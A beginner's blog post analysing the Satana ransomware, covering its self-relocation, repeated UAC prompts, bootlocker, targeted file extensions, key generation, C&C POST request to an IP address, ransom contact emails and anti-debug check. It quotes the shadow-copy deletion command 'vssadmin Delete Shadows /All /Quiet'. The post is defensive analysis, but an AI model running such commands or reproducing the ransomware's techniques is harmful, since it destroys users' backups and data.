Satana Malware Analysis

I haven’t done any malware analysis before and this would be my first post related to malware. I’m really interested but still quite a lot of things to learn 🙂 so I thought of starting off somewhere and this is the analysis of the ransomware named “Satana” by me. Obviously I hope you know who is Satan 👿

Samples:

Behavior Analysis

As soon as you run this the main executable will be deleted and a new sample will be created inside the %temp% folder.

View post on imgur.com

The following is the disassembly corresponding to this event.

View post on imgur.com


The application gives us the UAC prompt. No matter we press no the prompt will keep prompting.
When click yes it will start writing the malicious bootlocker code to the beginning of the disk.
The contact data relevant to each client is stored in the registry.

View post on imgur.com

View post on imgur.com

This malware also stores the ransomware message to the startup of the system.

View post on imgur.com

View post on imgur.com

This malware calls the OutputDebugString function to output debug information. This shows that this malware might be under a developing stage. We can use debugview to view the debug messages generated by the malware.

View post on imgur.com

Also shows us the encrypting files in progress.

View post on imgur.com

This malware will encrypt files with the following extensions:

.bak .doc .jpg .jpe .txt .tex .dbf .db .xls
.cry .xml .vsd .pdf . csv .bmp .tif .1cd .tax
.gif .gbr .png .mdb .mdf .sdf .dwg .dxf .dgn
.stl .gho .v2i .3ds .ma .ppt .acc .vpd .odt
.ods .rar .zip .7z .cpp .pas .asm

Also will delete the shadow copies of backups in the hard disk by using vssadmin.exe with the following parameters.

Delete Shadows /All /Quiet

View post on imgur.com

This is how the files would look like. All encrypted files are renamed to: __

View post on imgur.com

These are all the emails in this malware.

View post on imgur.com


matusik11@techemail.com
Sesillil@techemail.com
Monika343@ausi.com
adamadam@ausi.com
Gricakova@techemail.com
Missganz@ausi.com
Sarah_G@ausi.com
khoperia331@mail.com
orjovaja@mail.com
ryanqw31@gmail.com
banetnatia@mail.com
megrela777@mail.com
rayankirr@gmail.com
lanachka888@mail.com
Khaprov_igor@mail.com

After encrypting we see this ransomware message.

View post on imgur.com

View post on imgur.com

Once you click OK the system will restart and you will the bootlocker screen.

View post on imgur.com

Dynamic Analysis

The malware has many ways of execution. First it checks for parameters.

View post on imgur.com

When no parameters are supplied the malware will deploy itself into the %temp% directory and will execute the dropped version with GUID and the original path as runtime arguments deleting the original file from the location.


"C:\Users\user\AppData\Local\Temp\cmh.exe" {e29ac6c0-7037-11de-816d-806e6f6e6963} "C:\Users\user\Desktop\ee.exe"

View post on imgur.com

Once the user runs this malware it will try run as an administrator by making the user click yes. Even we click no the UAC prompt will be displayed. The authors call this as “Admin Flood”. Frist it will check for admin using setupapi.IsUserAdmin if we have admin right the parameter passed to ShellExecute is “open” if not “runas” and try to get admin privs.

View post on imgur.com

View post on imgur.com

View post on imgur.com

The GUID is mentioned in the ransomware note.

View post on imgur.com

This is how this malware enumerates the disks.

View post on imgur.com

Encryption

This malware divides the file into 32 byte long chunks and each chunk is encrypted separately. Before encrypting this malware generates a random key using the Read Time-Stamp Counter (RTDSC) function.

View post on imgur.com

After that the content of this buffer is converted to ASCII DWORD by DWORD.

View post on imgur.com

In my case the Key generated is:

7347D5A47560AED72D6D7CE4DDFC3B84B252405B2B171F492C3506F36686B85

This key is generated only once in each run.

View post on imgur.com


0040F128 A4 D5 47 73|D7 AE 60 75|E4 7C 6D 2D|84 3B FC DD
0040F138 05 24 25 0B|F4 71 B1 B2|6F 50 C3 92|85 6B 68 36|


7347D5A4 7560AED7 2D6D7CE4 DDFC3B8 4B252405 B2B171F4 92C3506F 36686B85

Next the chunk of file are XORed in DWORD size units with the first 4 DWORDs of the random buffer. Next they are passed into the another Crypt2 cipher.

View post on imgur.com

Network Communication

This malware send the following POST request to the C&C. Also notice that without encryption to the C&C the key is lost and even you pay you won’t get the files back if you or the C&C was offline while encryption is happening.

/add.php HTTP/1.0
Host: 185.127.26.186
Content-type: application/x-www-form-urlencoded
Content-length: 115

id=7&code=100&sdata=6.1.7600 0 1 WIN-C9AMVRVHN0T user 0&name=payload.exe&md5=&dlen=7EA61278DFBAD65AE31E707FFE019711

View post on imgur.com

Anti-Reversing Tricks

At the start you can see this malware calls the ntdll.NtQueryInformationProcess kernel API and changes the execution if the result is a non zero value.

View post on imgur.com

Other Findings

  • This malware won’t properly run on Windows XP, since vssadmin.exe is not present it gives us a error.
  • On testing this on VMWare we don’t see the bootlocker, only on VBox it was visible.

For a better analysis check out hasherazade’s post on this malware:

Satana ransomware – threat coming soon?

Advertisements

One thought on “Satana Malware Analysis

Leave a Reply